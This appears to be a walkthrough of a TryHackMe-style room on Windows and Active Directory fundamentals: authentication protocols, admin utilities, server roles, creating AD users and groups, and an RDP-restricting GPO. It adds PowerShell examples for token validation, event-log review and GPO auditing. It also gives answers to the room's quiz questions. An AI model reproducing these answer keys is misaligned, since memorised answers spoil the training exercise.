    On-premise Active Directory has a record of all users, PCs and Servers and authenticates the users signing in (the network logon). Once signed in, Active Directory also governs what the users are, and are not, allowed to do or access (authorization).


    In an on-premise Active Directory environment the authentication can be made by using the following protocols:


    •     NTLM
    •     LDAP / LDAPS
    •     KERBEROS




    NTLM / NTLM 2

    _______________

    NTLM uses a challenge-response sequence of messages between a client and a server system. NTLM  provides authentication based on a challenge-response authentication scheme. It does not provide data integrity or data confidentiality protection for the authenticated network connection.


     


     

     

     

    LDAP / LDAPS

    _______________

    The main difference between LDAP and LDAPS is that LDAPS supports encryption and therefore the credentials are not sent in plain text across the network.

    Another thing to keep in mind is that the Domain Controller (DC) can be considered a database of users, groups, computers and so on (contains information about objects). Using LDAP/LDAPS the user's workstation sends the credentials using an API to the Domain Controller in order to validate them and be able to log in.

    The procedure is similar to the image below:







    KERBEROS

    _______________

    Another way to authenticate is using Kerberos. Kerberos uses symmetric-key cryptography and requires trusted third-party authorization to verify user identities. The authentication process is similar to the one below:

     

     


     

     

    Authentication on Azure Active Directory



    Azure Active Directory is a secure online authentication store, which can contain users and groups. Users have a username and a password which are used when you sign in to an application that uses Azure Active Directory for authentication. So, for example, all of the Microsoft Cloud services use Azure Active Directory for authentication: Office 365, Dynamics 365 and Azure.





     

    Azure Active Directory supports the following authentication methods:

    •     SAML (Security Assertion Markup Language)
    •     OAUTH 2.0
    •     OpenID Connect




    SAML (Security Assertion Markup Language)

    _______________

    Security Assertion Markup Language (SAML) is a type of Single Sign-On (SSO) standard. It defines a set of rules/protocols that allow users to access web applications with a single login. This is possible because those applications (referred to as “Service Providers”) all trust the systems that verify users’ identities (referred to as “Identity Providers”).

    • Service Providers - These are the systems and applications that users access throughout the day.


    • Identity Providers - This would be the system that performs user authentication.




    OAUTH 2.0


    _______________

    OAuth 2.0 is a standard that apps use to grant client applications access to protected resources.

    OAuth 2.0 spec has four important roles:



    • The authorization server, which is the server that issues the access token.
    • The resource owner, normally your application's end-user, that grants permission to access the resource server with an access token.
    • The client, which is the application that requests the access token, and then passes it to the resource server.
    • The resource server, which accepts the access token and must verify that it is valid. In this case, this is your application.




    OpenID Connect

    _______________

    OpenID Connect is an authentication standard built on top of OAuth 2.0. It adds an additional token called an ID token.

    For that, it uses simple JSON Web Tokens (JWT). While OAuth 2.0 is about resource access and sharing, OIDC is all about user authentication.
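    As an added example (mine, not part of the room), here are the checks a relying party performs on the ID token that OpenID Connect adds on top of OAuth 2.0, written in PowerShell. The issuer URL, client id, subject and the HS256 shared secret are constructed for the demo. Azure AD signs ID tokens with RS256 and publishes the public keys in a JWKS document, so in practice the signature step uses the provider's RSA key rather than a shared secret; the claim checks (iss, aud, exp) are the same either way.

```powershell
# Added example, not from the TryHackMe room. Issuer, client id and secret are constructed.

function ConvertTo-Base64Url([byte[]]$Bytes) {
    # JWT segments are base64url without padding
    [Convert]::ToBase64String($Bytes).TrimEnd('=').Replace('+', '-').Replace('/', '_')
}

function ConvertFrom-Base64Url([string]$Text) {
    $s = $Text.Replace('-', '+').Replace('_', '/')
    switch ($s.Length % 4) { 2 { $s += '==' } 3 { $s += '=' } }
    return ,([Convert]::FromBase64String($s))     # leading comma keeps the byte[] in one piece
}

function Get-HmacSha256([string]$Secret, [string]$Data) {
    $hmac = [System.Security.Cryptography.HMACSHA256]::new([Text.Encoding]::UTF8.GetBytes($Secret))
    return ,($hmac.ComputeHash([Text.Encoding]::ASCII.GetBytes($Data)))
}

function New-DemoIdToken([string]$Secret, [System.Collections.IDictionary]$Claims) {
    # header.payload.signature, as the identity provider would mint it
    $h   = ConvertTo-Base64Url ([Text.Encoding]::UTF8.GetBytes((@{ alg = 'HS256'; typ = 'JWT' } | ConvertTo-Json -Compress)))
    $p   = ConvertTo-Base64Url ([Text.Encoding]::UTF8.GetBytes(($Claims | ConvertTo-Json -Compress)))
    $sig = ConvertTo-Base64Url (Get-HmacSha256 -Secret $Secret -Data ($h + '.' + $p))
    return $h + '.' + $p + '.' + $sig
}

function Test-DemoIdToken([string]$Token, [string]$Secret, [string]$Issuer, [string]$Audience) {
    # Returns a one-line verdict; a relying party has to do every one of these checks.
    $parts = $Token.Split('.')
    if ($parts.Count -ne 3) { return 'reject: malformed token' }

    $header = [Text.Encoding]::UTF8.GetString((ConvertFrom-Base64Url $parts[0])) | ConvertFrom-Json
    # Pin the algorithm; never let the token choose it.
    if ($header.alg -ne 'HS256') { return "reject: unexpected alg '$($header.alg)'" }

    $expected = Get-HmacSha256 -Secret $Secret -Data ($parts[0] + '.' + $parts[1])
    $actual   = ConvertFrom-Base64Url $parts[2]
    # Constant-time comparison so timing does not reveal how many signature bytes matched
    $diff = $expected.Length -bxor $actual.Length
    for ($i = 0; $i -lt [Math]::Min($expected.Length, $actual.Length); $i++) {
        $diff = $diff -bor ($expected[$i] -bxor $actual[$i])
    }
    if ($diff -ne 0) { return 'reject: bad signature' }

    $claims = [Text.Encoding]::UTF8.GetString((ConvertFrom-Base64Url $parts[1])) | ConvertFrom-Json
    $now = [DateTimeOffset]::UtcNow.ToUnixTimeSeconds()
    if ($claims.iss -ne $Issuer)   { return "reject: issuer '$($claims.iss)'" }
    if ($claims.aud -ne $Audience) { return "reject: audience '$($claims.aud)'" }
    if ($claims.exp -le $now)      { return 'reject: token expired' }
    return "accept: subject '$($claims.sub)'"
}

# Constructed values for the demo
$secret   = 'constructed-demo-secret-do-not-reuse'
$issuer   = 'https://login.example.test/thm.lab'
$clientId = 'demo-client-id'
$now   = [DateTimeOffset]::UtcNow.ToUnixTimeSeconds()
$token = New-DemoIdToken -Secret $secret -Claims ([ordered]@{
    iss = $issuer; sub = 'albert.einstein'; aud = $clientId; iat = $now; exp = $now + 300 })

Test-DemoIdToken -Token $token -Secret $secret -Issuer $issuer -Audience $clientId

# A payload altered after signing is rejected no matter what it claims, because the
# signature no longer matches header.payload:
$parts = $token.Split('.')
$parts[1] = ConvertTo-Base64Url ([Text.Encoding]::UTF8.GetBytes(
    '{"iss":"' + $issuer + '","sub":"someone-else","aud":"' + $clientId + '","exp":' + ($now + 300) + '}'))
Test-DemoIdToken -Token ($parts -join '.') -Secret $secret -Issuer $issuer -Audience $clientId
```

    The first call accepts the token; the second rejects it with "bad signature". The order of the checks matters: the signature is verified before any claim is read, so nothing in an unsigned or tampered payload is ever trusted.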

     

    1) Which Active Directory is cloud based?

    Ans :- Azure Active Directory


     

    2) Which authentication method does not provide data integrity?

    Ans :- NTLM


     
    3) Authentication method that assigns a ticket in order for a user to log in?

    Ans :- kerberos

     

    4) Which authentication method allows users to access applications with a single login (short name)?

    Ans :- SAML


    5) Authentication method that uses JSON Web Tokens?

    Ans :- openID connect



     



    Task 4 Utility tools


    Built-in utility tools

    Windows comes with a variety of utility tools. Some of them are:

    •     Computer Management
    •     Local Security Policy
    •     Disk Cleanup
    •     Registry Editor
    •     Command-line tools
    •     Registry Editor (Regedit)


    Let's break each of them down and see their usage and why they are important.


    Computer Management


    Computer Management contains more tools such as:

    •     Task Scheduler
    •     Event Viewer
    •     Shared Folders
    •     Local users & computers
    •     Performance Monitor
    •     Disk Management
    •     Services & Applications


     

    Task Scheduler - This is a tool that allows predefined actions to be automatically executed whenever a certain set of conditions is met (Ex: you can set up a date and time for a piece of software to be installed, or a script to run).

    Event Viewer - Probably one of the most important tools that come with Windows. The Event Viewer logs events that happen across the device (Ex: successful and failed login attempts, system errors, etc). The reason Event Viewer is important is that its events can be forwarded to a SIEM (Security Information and Event Management) system, which helps a company's IT team spot possible malicious activity.

    Shared Folders - A directory or folder that can be shared across the network and accessed by multiple users.

    Local users and computers - Using local users and computers we can create users, add them to different built-in groups, and they can be given different levels of access (Ex: User A can connect through RDP to a machine but user B can't).

    Performance Monitor - Monitors the different activities across the device such as CPU usage, memory usage, etc.

    Disk Management - Using Disk Management you can shrink, expand, create new partitions (drives) and format the partitions.

    Services & Applications - It is possible to check the running services on the system and you have the ability to start, stop or restart them.
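    The logon events mentioned under Event Viewer can be read from PowerShell as well. The function below is an added example of mine, not part of the room: it pulls successful (4624) and failed (4625) logons from the Security log and summarises the failures per account, which is the kind of aggregation a SIEM rule performs once the events are forwarded. The function and parameter names are my own; reading the Security log needs an elevated prompt.

```powershell
# Added example, not from the room. Run from an elevated PowerShell (standard users cannot
# read the Security log). Event IDs 4624/4625 are the standard Windows logon event IDs.
function Get-LogonSummary {
    param([int]$Hours = 24, [int]$MaxEvents = 5000)

    $filter = @{ LogName = 'Security'; Id = 4624, 4625; StartTime = (Get-Date).AddHours(-$Hours) }
    $events = Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue

    foreach ($e in $events) {
        # The useful fields live in EventData; read them from the event XML by name.
        $data = @{}
        foreach ($node in ([xml]$e.ToXml()).Event.EventData.Data) { $data[$node.Name] = $node.'#text' }
        $result = if ($e.Id -eq 4624) { 'Success' } else { 'Failure' }

        [pscustomobject]@{
            Time      = $e.TimeCreated
            Result    = $result
            Account   = "$($data.TargetDomainName)\$($data.TargetUserName)"
            LogonType = $data.LogonType   # 2 interactive, 3 network, 10 RemoteInteractive (RDP)
            Source    = $data.IpAddress
            Status    = $data.Status      # 4625 only: 0xC000006D bad credentials, 0xC0000234 locked out
        }
    }
}

# Failed logons per account in the last day. A burst against one account, or against many
# accounts from one source address, is what a SIEM correlation rule alerts on.
Get-LogonSummary -Hours 24 |
    Where-Object Result -eq 'Failure' |
    Group-Object Account |
    Sort-Object Count -Descending |
    Select-Object Count, Name
```

    Filtering the same output on LogonType 10 isolates RDP logons, which is handy when testing the GPO built later in this room.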


     

    Local Security Policy


    Local Security Policy is a group of settings you can configure to strengthen the computer's security. Even though most policy settings in Windows are fine, there are a few that need adjusting for enhanced security. You can set the minimum password length, the password complexity level, you can disable guest & local administrator accounts, and many more.

    Note: If the computer is not joined to an Active Directory domain, disabling the local administrator account is a bad idea.


    Disk Cleanup

    Another useful utility is Disk Cleanup. Using Disk Cleanup we can delete files that are no longer needed by the system and just take up disk space. Running Disk Cleanup as administrator we can also clean system files (Ex: sometimes, after installing updates, some files remain on disk even though they are no longer needed).

    To access Disk Cleanup right-click on Local Disk C and click Properties. You should see a button in the General tab named "Disk Cleanup".


     

     

    You just need to tick the box/files you want to clean and press OK.


    Registry Editor


    The Windows registry database stores many important operating system settings. For example, it contains entries with information about what should happen when double-clicking a particular file type or how wide the taskbar should be. Built-in and inserted hardware also stores information in the registry when the driver is installed; this driver is called up every time the system is booted up.

    To access the Registry Editor you can either search it or use Windows Key + R and type RegEdit.


    Command-line tools


    Windows comes equipped with two built-in command-line tools, plus a third that can be installed:


    •     CMD
    •     Powershell
    •     Windows Terminal


    CMD is the command-line interpreter for Microsoft Windows operating systems used to automate various system-related tasks using scripts and batch files. Users can interact with the OS directly using text-based commands. It emulates most of the command line abilities available in MS-DOS through a command-line interface.


    Powershell is mainly used by sysadmins to manage the network and domain they handle, as well as the computers and other devices that are part of it. PowerShell is a scripting language. PowerShell can interpret both batch commands and PowerShell commands, whereas the command prompt can only interpret batch commands.


    Both CMD and Powershell are powerful command-line tools used to automate system administration tasks by writing a script/batch file. However, CMD has limited administration capabilities as compared to Powershell, which, on the other hand, is a more advanced and modern shell implementation with additional features and enhancements (Ex: cmdlets).


    Windows Terminal can be used instead of Powershell and CMD and can be installed from the Microsoft Store. The application includes multiple tab support, alongside themes and customization for developers who want to tweak the Terminal.

    Registry Editor


    Registry Editor can be considered a database that contains low-level settings for Microsoft Windows and its applications. The registry is structured into the following root keys:

    •     HKEY_CLASSES_ROOT
    •     HKEY_CURRENT_USER
    •     HKEY_LOCAL_MACHINE
    •     HKEY_USERS
    •     HKEY_CURRENT_CONFIG




    A feature of Powershell is that you can browse the registry like a file system. You can do that by typing "cd <REG DB>" (Example: cd HKLM:\).

     


     

    Windows also has a built-in tool named "reg" which can be used from the command line to add, remove, query, import and export registry keys, among other operations.


    There is also a GUI available. You can search for "Regedit" or type it in the command line.


    There is no point in memorizing the registry paths of particular settings. You can look them up on the internet when needed.
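    As an added example (mine, not the room's), the two ways of reaching the same registry data that this section describes, the PowerShell registry provider and reg.exe, side by side. The key HKCU:\Software\THMDemo and its value are constructed for the demo and removed at the end; everything touches only the current user's hive, so it runs without administrator rights.

```powershell
# Added example, not from the room. HKCU:\Software\THMDemo is a constructed demo key.
Set-Location HKLM:\                                          # the "cd HKLM:\" the room shows
Get-ChildItem -Name -ErrorAction SilentlyContinue            # subkeys of the hive, like "ls"

# Read values from a key through the provider (the OS version strings, for example)
Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion' |
    Select-Object ProductName, CurrentBuild

# Create, read, export and delete a key in the current user's hive
$demoKey = 'HKCU:\Software\THMDemo'
New-Item -Path $demoKey -Force | Out-Null
New-ItemProperty -Path $demoKey -Name 'Setting' -Value 'lab' -PropertyType String | Out-Null
(Get-ItemProperty -Path $demoKey).Setting

# The same key as reg.exe sees it (reg uses HKCU\..., the provider uses HKCU:\...)
reg query HKCU\Software\THMDemo
reg export HKCU\Software\THMDemo "$env:TEMP\THMDemo.reg" /y
Get-Content "$env:TEMP\THMDemo.reg" | Select-Object -First 5

# Clean up
Remove-Item -Path $demoKey -Recurse
Remove-Item "$env:TEMP\THMDemo.reg"
Set-Location C:\
```

    The provider returns objects, so values can be filtered and compared in scripts; reg.exe is the better fit for batch files and for .reg exports that can be diffed before and after a change.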





    Task 5 Types of servers

    What is a server?

    A server is a piece of hardware or software that provides functionality for other software or devices.



    Types of servers

    Servers can be used for a variety of actions or things. The most common ones are:

    •     Domain Controller
    •     File server
    •     Web server
    •     FTP Server
    •     Mail Server
    •     Database Server
    •     Proxy Server
    •     Application Server



    Domain Controller - Might be one of the most important servers, because in an AD or AAD infrastructure it lets us control users and groups, restrict actions, improve security, and do much more across the other computers and servers.

    File Server - File servers provide a great way to share files across devices on a network.

    Web Server- It serves static or dynamic content to a Web browser by loading a file from a disk and serving it across the network to a user’s Web browser.

    FTP Server - Makes possible moving one or more files securely between computers while providing file security and organization as well as transfer control.

    Mail Server - Mail servers move and store mail over corporate networks (via LANs and WANs) and across the Internet.

    Database Server - A database server is a computer system that provides other computers with services related to accessing and retrieving data from one or multiple databases.

    Proxy Server - This server usually sits between a client program and an external server to filter requests, improve performance, and share connections.

    Application Server - They're usually used to connect the database servers and the users.
     

    Read the above.
     

    1) Which can be considered the most important server?

    Ans :- Domain Controller


    2) Which server can store emails?

    Ans :- Mail Server






    Task 6 Users and Groups Management


    Users and Groups Management in Active Directory

    In Active Directory, user management is done using the Active Directory Users and Computers console. To access it, go to Tools > Active Directory Users and Computers in Server Manager.


    Before any other action, let's enable Advanced Features, which exposes extra tabs when viewing an object's properties. That is done by going to View > Advanced Features.


    By double-clicking on thm.lab we are presented with the Active Directory tree.



    Let's create an Organizational Unit (OU) where to store the users. To do that right-click on the domain name (thm.lab) and go to New > Organizational Unit. I named it LAB and clicked OK to create it.



    Let's create two more OUs inside the newly created OU (they will appear nested). In one OU we'll store users and in the second one we'll store groups. To create the OUs we can repeat the steps above (right-click on the LAB OU > New > Organizational Unit).

    Time to create some users and groups! To do so right-click on the Users OU and go to New > User and fill in the information required.



    Click Next and set a password for the user.



    The reason I checked only "Password never expires" is that I do not want the password to expire after a period of time (the default in AD is 42 days). In a production environment, you would probably check "User must change password at next logon" so the user can set a password of their own choosing after you have created the AD account.

    Since the password can be set to expire after a period of time, it would be a bad idea to check "User cannot change password", because the user won't be able to reset it and you will have to intervene manually.

    As for the last box, "Account is disabled", the action it takes is obvious: it disables the user account. You might want to disable a user account when the user is on leave (let's say a 6-month leave) and you do not want them, any other colleague or a malicious entity to use the account in the meantime.

    Click on Next and you will be shown the account information and click Finish to finish the account creation.

    Note: The username that is going to be used by the user in order to authenticate is the one you set in the User Logon Name.

    You've successfully created your first AD user. Now, create two more users and name them as you wish.

    We should have three users in the AD:




    Let's move to the Groups OU. Right click on the OU > New > Group.

    I named the group Admins and clicked OK to create it.



    Then I created another group named RDP Access.


    And finally using the same method create one more group named No RDP Access.

    We should have the following groups in AD:


    To assign a user to a group you can do that in two ways:

    1. Right-clicking a user > Add to a group



    2. Double-clicking a group > click on Members tab > Add



    Using the first method, let's add Albert Einstein to the Admins group. A window will open asking you to search for an object in AD. Type the name of the group you created (in my case Admins) in the "Enter the object name to select" field, click Check Names, and then OK to add the user to the specified group.



    Proceed to add one of the created users to the RDP Access group and the other to the No RDP Access group.

    Another thing to keep in mind is that an object can be a member of another object (Ex: A group can be a member of another group).

    We added Albert Einstein to a group named Admins. Let's add the Admins group to the Domain Admins group. To do that we can right-click on Admins group > Add to a group and search for Domain Admins and press OK.



    As we've done with Albert Einstein's account, add both the RDP Access and No RDP Access groups to the Remote Desktop Users group.

    Note: Even though the No RDP Access group has been added to the Remote Desktop Users group, its members can still be blocked from RDP using a GPO. This will be done in the next task (Creating your first GPO).
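    The same OUs, users, groups and nested memberships built through the GUI above, done with the ActiveDirectory PowerShell module, as an added example of mine rather than part of the room. The domain (thm.lab), OU and group names follow the room; the logon names, the third user and the passwords are constructed. The final two commands are the check a practitioner cares about: nested membership means Albert ends up a Domain Admin without ever being added to that group directly.

```powershell
# Added example, not from the room. Run on the DC (or with RSAT) as a Domain Admin.
# Domain, OU and group names follow the room; logon names, the third user and passwords are constructed.
Import-Module ActiveDirectory

$domainDN = (Get-ADDomain).DistinguishedName             # DC=thm,DC=lab
New-ADOrganizationalUnit -Name 'LAB'    -Path $domainDN
New-ADOrganizationalUnit -Name 'Users'  -Path "OU=LAB,$domainDN"
New-ADOrganizationalUnit -Name 'Groups' -Path "OU=LAB,$domainDN"
$usersOU  = "OU=Users,OU=LAB,$domainDN"
$groupsOU = "OU=Groups,OU=LAB,$domainDN"

# Users. The switches mirror the checkboxes in the New User wizard:
#   lab:        -PasswordNeverExpires $true   (what the room ticks)
#   production: -ChangePasswordAtLogon $true  so the user chooses their own password
$users = @(
    @{ Given = 'Albert'; Surname = 'Einstein'; Sam = 'aeinstein' },
    @{ Given = 'Jim';    Surname = 'Carrey';   Sam = 'jcarrey'   },
    @{ Given = 'Demo';   Surname = 'User';     Sam = 'duser'     }   # constructed third user
)
foreach ($u in $users) {
    New-ADUser -Name "$($u.Given) $($u.Surname)" -GivenName $u.Given -Surname $u.Surname `
        -SamAccountName $u.Sam -UserPrincipalName "$($u.Sam)@thm.lab" -Path $usersOU `
        -AccountPassword (Read-Host -AsSecureString -Prompt "Password for $($u.Sam)") `
        -PasswordNeverExpires $true -ChangePasswordAtLogon $false -Enabled $true
}

# Groups, then memberships (both GUI methods in the room write the same 'member' attribute)
foreach ($g in 'Admins', 'RDP Access', 'No RDP Access') {
    New-ADGroup -Name $g -GroupScope Global -GroupCategory Security -Path $groupsOU
}
Add-ADGroupMember -Identity 'Admins'        -Members 'aeinstein'
Add-ADGroupMember -Identity 'RDP Access'    -Members 'jcarrey'
Add-ADGroupMember -Identity 'No RDP Access' -Members 'duser'

# Nesting: a group as a member of another group
Add-ADGroupMember -Identity 'Domain Admins'        -Members 'Admins'
Add-ADGroupMember -Identity 'Remote Desktop Users' -Members 'RDP Access', 'No RDP Access'

# Verify the effective result. -Recursive expands nesting, so aeinstein is listed under
# Domain Admins although he was only added to Admins; a privileged-group audit must use it.
Get-ADGroupMember -Identity 'Domain Admins' -Recursive | Select-Object name, samAccountName
Get-ADPrincipalGroupMembership -Identity 'jcarrey' | Select-Object name
```

    Get-ADGroupMember without -Recursive would show only the Admins group under Domain Admins and hide the user behind it, which is exactly how nested privilege goes unnoticed in reviews.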



    Task 7 Creating your first GPO


    What are Group Policy Objects?

    A GPO or a Group Policy Object is a feature of Active Directory that adds additional controls to user accounts and computers.

    Group Policy settings include local settings, site-wide settings, domain-level settings and settings applied to organizational units.

    Creating our first GPO


    To create a GPO we need to go to Tools > Group Policy Management inside the Server Manager.


     

    Right-click on "Group Policy Objects" and create a new object. I will name mine "Groups GPO".
    To edit the GPO right-click on it > Edit.

     


    For the purpose of this demo, we will set different permissions for the groups recently created.

    First, let's let users authenticate using RDP. To do so, go to Policies > Windows Settings > Security Settings > Local Policies > User Rights Assignment and double-click on Allow log on through Remote Desktop Services.

     

     

     

    Select Define these policy settings > Add user or group > Browse

     


    Search for Admins and RDP Access groups and click OK > OK to add them.


     

     

    To block a user or a group from logging in using RDP, double-click Deny log on through Remote Desktop Services and add the No RDP Access group there.


    We can close the editor and go back to the Group Policy Management console. In order to make the policy apply, we have to link the GPO. To do that, right-click on the Domain Controllers OU > Link an Existing GPO, select the GPO you created (Groups GPO in my case) and press OK.



     

    To apply the GPO open a CMD as an administrator (right-click on it > Run as administrator) and type the following: gpupdate /force and wait for the policy to apply.


    Testing the GPO


    Let's try to RDP into the machine using each user and see the different level of access each has.

    The first user I'm going to log in as is Albert Einstein, who has Domain Admin rights. The logon is successful. Open a CMD as admin and type "whoami".



     

    As you can see, we were able to start an elevated CMD.


    Sign out and log in using the account added to RDP Access group (In my case Jim Carrey).

    Try opening an elevated CMD (right-click on CMD > Run as administrator). You will notice that UAC (User Account Control) asks for admin credentials. If you enter the credentials (username and password) of the account you are currently logged in with, the CMD prompt will not open. This happens because you are a standard user on the machine, not an administrator.


     

    Note: You can spawn the shell if you use an administrator credential (in my case Albert Einstein).


    Lastly, try logging in with the account added to the No RDP Access group. You will get the following error:


    This happens because, even though the No RDP Access group has been added to the Remote Desktop Users group, the GPO created earlier blocks RDP access for the users in that group: a Deny right wins over an Allow right.
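    The GPO creation and linking from this task, plus the check I would actually run afterwards, as an added example of mine rather than the room's own steps. The GPO name and the link target follow the room; the function name is my own. There is no GroupPolicy cmdlet for User Rights Assignment entries, so the Allow/Deny "log on through Remote Desktop Services" settings are still made in the editor as described above; what the script adds is an audit of the rights the policy actually produced on the machine, by exporting the effective security settings with secedit and translating the SIDs back to names.

```powershell
# Added example, not from the room. Run in an elevated PowerShell on the DC.
Import-Module GroupPolicy
$domainDN = (Get-ADDomain).DistinguishedName

# Create the GPO and link it where the room links it (the Domain Controllers OU)
$gpo = New-GPO -Name 'Groups GPO' -Comment 'RDP logon rights for the LAB groups'
New-GPLink -Name $gpo.DisplayName -Target "OU=Domain Controllers,$domainDN" | Out-Null
# Set Allow/Deny "log on through Remote Desktop Services" in the editor as in the room, then:
gpupdate /force

# Audit what the policy produced. secedit exports the effective local security settings;
# user rights appear as "SeXxx = *SID,*SID", so translate each SID to an account name.
function Get-RdpLogonRights {
    $inf = Join-Path $env:TEMP 'secpol.inf'
    secedit /export /cfg $inf /areas USER_RIGHTS | Out-Null
    $wanted = 'SeRemoteInteractiveLogonRight', 'SeDenyRemoteInteractiveLogonRight'
    foreach ($line in Get-Content $inf) {
        if ($line -notmatch '^(Se\w+)\s*=\s*(.*)$' -or $wanted -notcontains $Matches[1]) { continue }
        $principals = foreach ($entry in $Matches[2].Split(',')) {
            $entry = $entry.Trim().TrimStart('*')
            try   { ([System.Security.Principal.SecurityIdentifier]$entry).Translate([System.Security.Principal.NTAccount]).Value }
            catch { $entry }     # already a name, or a SID that no longer resolves (orphaned entry)
        }
        [pscustomobject]@{ Right = $Matches[1]; Principals = ($principals -join ', ') }
    }
    Remove-Item $inf
}
Get-RdpLogonRights

# From the user's side (what the room tests by logging in as each account): the groups in
# the session token are what the Allow and Deny rights are evaluated against.
whoami /groups | Select-String 'Domain Admins|Remote Desktop Users|RDP Access'
```

    If "No RDP Access" shows up under SeDenyRemoteInteractiveLogonRight and "RDP Access" under SeRemoteInteractiveLogonRight, the policy applied as intended; an unresolved SID in either list usually means a group was deleted while its right was left behind and should be cleaned up.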



